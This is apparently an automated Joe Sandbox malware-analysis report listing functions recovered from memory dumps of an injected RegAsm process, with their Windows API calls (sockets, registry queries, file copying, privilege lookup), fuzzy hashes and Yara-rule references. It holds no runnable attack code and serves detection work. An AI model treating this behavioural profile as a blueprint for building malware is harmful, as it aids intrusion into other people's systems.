WSAIoctl.WS2_32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF2BC1

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 0fca04731274cadcc140dae3165ae1128829b186c681b7271e55d7ceb937e305
Instruction ID: ee5bdd915c4cf0471e98d3258b03b4536ebc92219f7277e98160fd9c97eaf81a
Opcode Fuzzy Hash: 0fca04731274cadcc140dae3165ae1128829b186c681b7271e55d7ceb937e305
Instruction Fuzzy Hash: 71215C71100708AFEB218F55DC84F66BBE8EF04720F04846AEE468A651D234E904DA72

Uniqueness

Uniqueness Score: -1.00%

Function 00CF243A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 00CF24AD

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 09369b310f721e68d4cc23eb94f27e8b088d0153afef00cce16e7d3cc6d7bae5
Instruction ID: db53a9b5d805468d4f48c99d6ff7fac3874967b34c2d40bc36f6fdad90622442
Opcode Fuzzy Hash: 09369b310f721e68d4cc23eb94f27e8b088d0153afef00cce16e7d3cc6d7bae5
Instruction Fuzzy Hash: 0521C271600344AFE721CF69DC84B66FFE8EF04320F14846AEE459B241D775E904CA76

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DAAFB, Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000EB4,?,?), ref: 1D7DAB7E

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: a9dde3678478bfbb65bf634bf924501167117cfba629a6134d1aac6605044bd0
Instruction ID: 050738ff490ab2f64de5c9811ec808a701de56a028955b089feb5ac461b67aa2
Opcode Fuzzy Hash: a9dde3678478bfbb65bf634bf924501167117cfba629a6134d1aac6605044bd0
Instruction Fuzzy Hash: F821D5715087806FD3128B26CC40F72BFB8EF87620F0981CAED848B652D220A915C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DAA12, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 1D7DAA8C

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2307e6a2acb1d04f4b87ffba4ebf79460abd7e37ec3d0d602372f7866b82402e
Instruction ID: b0278063b1434bfd8cab582b2ff4b42703566775612a8b8dd51078084c61b7df
Opcode Fuzzy Hash: 2307e6a2acb1d04f4b87ffba4ebf79460abd7e37ec3d0d602372f7866b82402e
Instruction Fuzzy Hash: EC21AE71600B04AFE761DF15CD84F63BBE8FF44720F08856AE9458B252D334E808CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00CF15C2, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF1634

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e765f7e19aed9a9a80890f737e231e89d22bdadfda9a37936f7c82fb3a0ca190
Instruction ID: edabe409bec36ad7bb8db22d7bfdcd05e2aea8461ad23f572e3078f65bbce2d7
Opcode Fuzzy Hash: e765f7e19aed9a9a80890f737e231e89d22bdadfda9a37936f7c82fb3a0ca190
Instruction Fuzzy Hash: 382190B1600304AFEB61CF55DC44FA7BBA8EF04720F08846AEE45DB252D774E908CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2EA6, Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 00CF2F2A

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 8f5b77d7399a00ffd4c134683b959f0926350fd3552ee9655859c93553bca9fb
Instruction ID: 22c7941d96d365cfbddc2ae18bdc4e3cd7e6f99d3c0a442867889bebb2117ca4
Opcode Fuzzy Hash: 8f5b77d7399a00ffd4c134683b959f0926350fd3552ee9655859c93553bca9fb
Instruction Fuzzy Hash: 8B218E764093849FDB228F65D884A92FFF4EF06310F0984DEE9858B163D275A819DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF18DB, Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF195C

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 1b192b6fa4cbe23c87610dd904683e1ce330ca00f89eec0404e69ca884d7f034
Instruction ID: 839ff5e60c10474a72d3290e2dec96272751d718cca5c48284b19b9031b09e20
Opcode Fuzzy Hash: 1b192b6fa4cbe23c87610dd904683e1ce330ca00f89eec0404e69ca884d7f034
Instruction Fuzzy Hash: FE219371408384AFE7228B15DC44B66FFA8EF46320F4884DAED849B153C265A949CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2096, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE(?,?), ref: 00CF2101

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: bcd62c6fc6b03505de5e9172a722ab5e5543b5f942ef9c2d7801518d0e8c1050
Instruction ID: 0109ebba8058ea8dd10ec39f29b1c1dc37f91a0b57e699be994e54a7c537d5e5
Opcode Fuzzy Hash: bcd62c6fc6b03505de5e9172a722ab5e5543b5f942ef9c2d7801518d0e8c1050
Instruction Fuzzy Hash: 1B21C0B1600344AFE721CF69CD85B66FBE8EF04320F14846AEE458B242D775E904CA76

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DB58A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 1D7DB5EE

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: cc3ae7050d58dfaaee2a60450f8e84bb71108d40b48cfc90878246b6a1543385
Instruction ID: 6f06d5c3671fb0bb5f25ecf356d94ff6fd3e92ecd560d7c695893dd0a0747191
Opcode Fuzzy Hash: cc3ae7050d58dfaaee2a60450f8e84bb71108d40b48cfc90878246b6a1543385
Instruction Fuzzy Hash: 0A1181B1600704AFE761CF5ADC85F6ABBA8EF44720F04846AED49DB255D674E408CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1ADE, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 00CF1B4A

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 276faf9dedd03328e0c95b6ed44742ca5b25ef49346a8071b4b9c76aa03f6b11
Instruction ID: a7b3c2aedd046aacf491fb0d3b0530e3d4c9ff452253407ed01a0a52ff42310a
Opcode Fuzzy Hash: 276faf9dedd03328e0c95b6ed44742ca5b25ef49346a8071b4b9c76aa03f6b11
Instruction Fuzzy Hash: 4C219FB1500744EFEB21CF65DD45B66FBA4EF04320F18886EEE858A651D375A404CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2196, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 00CF220A

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: b1af79a7ee739f0ee6a8b48e354c7d1968cf1670750a2a6959231cd0ba1df5dd
Instruction ID: f56058c47ddb96a98fa0a6eadd75ac1ca7036342f0f03c716e8305551b75d8f8
Opcode Fuzzy Hash: b1af79a7ee739f0ee6a8b48e354c7d1968cf1670750a2a6959231cd0ba1df5dd
Instruction Fuzzy Hash: 72219AB1500344AFE721CF5ACD84FA6FBE8EF08320F14845EEA859B652D775A508CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1BA3, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,?,?,?,?), ref: 00CF1C20

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: ebebafbde276fd96c6d6cd688689c46b8a710f6d7a2d162977679584697c3a70
Instruction ID: 83166534947ed1a6d4154765043b671c2892ba7c60e1e266bc16a9b3749fd88c
Opcode Fuzzy Hash: ebebafbde276fd96c6d6cd688689c46b8a710f6d7a2d162977679584697c3a70
Instruction Fuzzy Hash: 84215C724093809FDB128F65DD44A52BFB4EF06320F0985DADD848F163C2359959DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CF354C, Relevance: 1.6, APIs: 1, Instructions: 66fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?,80F9F9BA,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00CF35BA

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 0183aa7e195da07221d840c7ed67a3bd460a2432af8a86c0f49ff5d2d0e2a27e
Instruction ID: 3bcc3e4e8d8087b71360a103c816b629fc1a34b1efd5305dc0c0ba87be974a4f
Opcode Fuzzy Hash: 0183aa7e195da07221d840c7ed67a3bd460a2432af8a86c0f49ff5d2d0e2a27e
Instruction Fuzzy Hash: 2521A5B25053849FD761CF25DC85B53BFE8EF55220F0884AAED45CB252D234D908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1DFA, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF1E6C

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: cca898732054f05c2709f2988cac168f60fb958e0c751b9e74ad7e461b9e9d80
Instruction ID: 6dad0e0615b7443dce530ce4fd12c71d238ecce9ee2f9aa655a9d673e4dc1d33
Opcode Fuzzy Hash: cca898732054f05c2709f2988cac168f60fb958e0c751b9e74ad7e461b9e9d80
Instruction Fuzzy Hash: 88116D72500708AEE761CF16DC88F67BBE8EF04720F08845AEE459A652D764E908CA72

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2612, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF2671

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 034d3557fb2024a2cb06ad9cc8ea4e6c521c2cd1d1b2ea6016432df4c5b68aad
Instruction ID: 5aaaa9f56f9b75a6ebb55090890cc34da5d18c6b4ec35f78862ab2d31d8bcd93
Opcode Fuzzy Hash: 034d3557fb2024a2cb06ad9cc8ea4e6c521c2cd1d1b2ea6016432df4c5b68aad
Instruction Fuzzy Hash: DD119372500304AFEB61CF65DD45F6BBBA8EF04320F14846AEE45DB655D674E404CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DB4A2, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 1D7DB4FE

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 1b598138b972d9f1e12b049e3ca7b17909f446310d04cc8c9e8a3eb564e23774
Instruction ID: feaa0a277971f4a762ad6331ec760ead6598b300446d87fe0896eea098590a68
Opcode Fuzzy Hash: 1b598138b972d9f1e12b049e3ca7b17909f446310d04cc8c9e8a3eb564e23774
Instruction Fuzzy Hash: 6811C471500704AFEB61CF59DC45B67FBA8EF44720F14846AED499B245D674E404CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00CF3490, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(?,?,80F9F9BA,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00CF34F7

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: d9de63e5b2533a52461ae18fc2a265b99823335f788d48f55abad5dd283615cc
Instruction ID: dd0009476100341cf228cb4c972313102bba28a54515cce6eb5ca98d1d6d691e
Opcode Fuzzy Hash: d9de63e5b2533a52461ae18fc2a265b99823335f788d48f55abad5dd283615cc
Instruction Fuzzy Hash: 9B1172725083849FD751CF25DC84B66BFE8EF45220F0984AAED45CF252D234E948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2D26, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF2D8A

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 78e21d7a5cc01db4a049159a6324b6e1d2bad1ceb693bc530f677247a6c45454
Instruction ID: 293874e5b5e840186a50e348e53e730d80ac0f70d11c6add7c049d415a38c603
Opcode Fuzzy Hash: 78e21d7a5cc01db4a049159a6324b6e1d2bad1ceb693bc530f677247a6c45454
Instruction Fuzzy Hash: 361160B2500304AFEB61CF55DD84FA7BBACEF44720F14846AEE459B246D674E504CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DA836, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,80F9F9BA,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 1D7DA8A8

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 00e03e07daf90f3721587a918f774351adf55b2f405e3bbab3894932a5181cbb
Instruction ID: ab7853654a42e07360d9a4de525637c6e36b74590aaab0bd90b467c3c555f2e8
Opcode Fuzzy Hash: 00e03e07daf90f3721587a918f774351adf55b2f405e3bbab3894932a5181cbb
Instruction Fuzzy Hash: A02158714097C4AFD7138B258C94652BFB4AF03224F0984DBEC858F1A3D2695908DB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DA78B, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D7DA7F6

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8da5923355c5836684fe58d661c26d29d5a94b2b5237d0bb93d492653ad8e18a
Instruction ID: eac98fbece7a9ef380c101f7a39d1086f60f8c980d4e92fac196d033ebda39d8
Opcode Fuzzy Hash: 8da5923355c5836684fe58d661c26d29d5a94b2b5237d0bb93d492653ad8e18a
Instruction Fuzzy Hash: EF117272409780AFDB228F55DC44B63FFF4EF46220F08849AED898B552D275A419DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF0E4E, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF0EAD

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: f8d13e1e1540cdf6fed44f8f93b81801a299181fea7cea87b467f2f721001e4d
Instruction ID: 3d435edd2ab05567c0147fb3ff07e3fa806f5934c5c720064584fa82f8a945f4
Opcode Fuzzy Hash: f8d13e1e1540cdf6fed44f8f93b81801a299181fea7cea87b467f2f721001e4d
Instruction Fuzzy Hash: 5011B271500304AFEB21CF55DC45B66FBA8EF04720F14886AEE859B546D275A404CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00CF3615, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNEL32(?,80F9F9BA,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00CF3674

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: DirectoryRemove
String ID:
API String ID: 597925465-0
Opcode ID: a34bea9f90f511dd4cebca0410402930a272c6a284068cc5758235482cf3e11f
Instruction ID: caf384f7db48cd761373f1b50671d057ff027e91e7ee1e54930fd82dffa3f55c
Opcode Fuzzy Hash: a34bea9f90f511dd4cebca0410402930a272c6a284068cc5758235482cf3e11f
Instruction Fuzzy Hash: 8111B272509384AFD711CF25DC85B56BFE8EF02220F0984AAED45CF252D274E948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF168E, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,80F9F9BA,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00CF16EC

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 1219ba840bac7a3160998fc044e9d8ee2062eca9ff5195318417dea7d8e70b8c
Instruction ID: 0a1fdccce4202ab05ef553b558f1a26ff35dc6b43afb104e613138b44dda2595
Opcode Fuzzy Hash: 1219ba840bac7a3160998fc044e9d8ee2062eca9ff5195318417dea7d8e70b8c
Instruction Fuzzy Hash: 2B1193755093C49FD7128F65DC44752BFB4DF02220F0C84EBED858F262D235A808CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2A6A, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF2AC3

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 8116825e7547f7d62bfb07ff3b52ded5e87afcc78c1b729a6461470a9303ab11
Instruction ID: aad3b1f8451e458d68a08e85bcd3902a754c1c4ef1d3796470810cf5cc0e4525
Opcode Fuzzy Hash: 8116825e7547f7d62bfb07ff3b52ded5e87afcc78c1b729a6461470a9303ab11
Instruction Fuzzy Hash: 7011A3B1500304AFEB61CF55DC84B66FBA8EF04320F14846AEE459B245D274A904CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2542, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF2598

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: e553863e8a50bf83be50531c4e445fea6e19be437562874914bc086e6ad40352
Instruction ID: c80629911488a40647165c5d20222f5709e8dc5a54b869f36c0196a582f92cb2
Opcode Fuzzy Hash: e553863e8a50bf83be50531c4e445fea6e19be437562874914bc086e6ad40352
Instruction Fuzzy Hash: 4F11E5B1504308AFEB61CF15DC84B66FB98EF04320F5484AAEE459F246D674E504CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF2E0A, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF2E69

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: df61b1ede95b698adb18b314fe40937885551de36b709becafb7904e219b7995
Instruction ID: e854e930a22cd19c7ba536cd2af58736473ce76133cf04089350143360249bbf
Opcode Fuzzy Hash: df61b1ede95b698adb18b314fe40937885551de36b709becafb7904e219b7995
Instruction Fuzzy Hash: E7110272500704AFEB218F16CC80F67FBA8EF04721F14845AEE455B256D374E808DBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00CF0522, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000EB4), ref: 00CF058B

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0ad506c605ac929f55ead8b71ce69463b548e84a634a1d6813c51d7752c6ef67
Instruction ID: ea6886521020020ab9b347396346a0bb7f8405ad5f9cdcbf99f73796c76c4ae5
Opcode Fuzzy Hash: 0ad506c605ac929f55ead8b71ce69463b548e84a634a1d6813c51d7752c6ef67
Instruction Fuzzy Hash: 1711E571500304AFE770CB15DC85B76FB98DF04720F64805AEE445B286D2B4E908CAB6

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DA078, Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 1D7DA0D5

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 0a6ddbb9a28daa80b575e840e23f78952f1b7a26d45de93a919cf09a1cfb6134
Instruction ID: d59b2bd4cecaf5988409512abb0272fbb50dde6522a2e86e1cbd4b9faee20d67
Opcode Fuzzy Hash: 0a6ddbb9a28daa80b575e840e23f78952f1b7a26d45de93a919cf09a1cfb6134
Instruction Fuzzy Hash: E8119171409780AFD722CF15DD44B52FFB4EF55224F0884AFED898F552C275A818CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D7DAD22, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D7DAD6A

Memory Dump Source

Source File: 00000007.00000002.1035171507.000000001D7DA000.00000040.00000001.sdmp, Offset: 1D7DA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1d7da000_RegAsm.jbxd

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 079bb91da2c75e0ef1ef57fc1788e300e24330dcef14f824532138ff0133d421
Instruction ID: 43459ed4f2b1b225cbcbab2d85e08ac0708e4784447ede21da6c237c6cc2327b
Opcode Fuzzy Hash: 079bb91da2c75e0ef1ef57fc1788e300e24330dcef14f824532138ff0133d421
Instruction Fuzzy Hash: 64117CB1A007419FE7A0DF2AD984757BBA8FB14621F08C4AADC49CB64AD674E404CA62

Uniqueness

Uniqueness Score: -1.00%

Function 00CF3572, Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(?,?,?,80F9F9BA,00000000,?,?,?,?,?,?,?,?,72203C38), ref: 00CF35BA

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_cf0000_RegAsm.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: 7f5831f904dba52e38c9cd39af3a8cd8b3bbbaf68ea96bb40e511d26fe351621
Instruction ID: 53be5fe9a4a68d0caad1657b5ae35e91f695ccb57ff6816217df6c40e79b60dc
Opcode Fuzzy Hash: 7f5831f904dba52e38c9cd39af3a8cd8b3bbbaf68ea96bb40e511d26fe351621
Instruction Fuzzy Hash: E31161B16043449FEB60CF2ADC85766FBD8EF54321F0884AADD49CB646E674E904CB72

Uniqueness

Uniqueness Score: -1.00%

Function 00CF1906, Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000EB4,80F9F9BA,00000000,00000000,00000000,00000000), ref: 00CF195C

Memory Dump Source

Source File: 00000007.00000002.1031520402.0000000000CF0000.00000040.00000001.sdmp, Offset: 00CF0000, based on PE: false

Joe Sandbox IDA Plugin

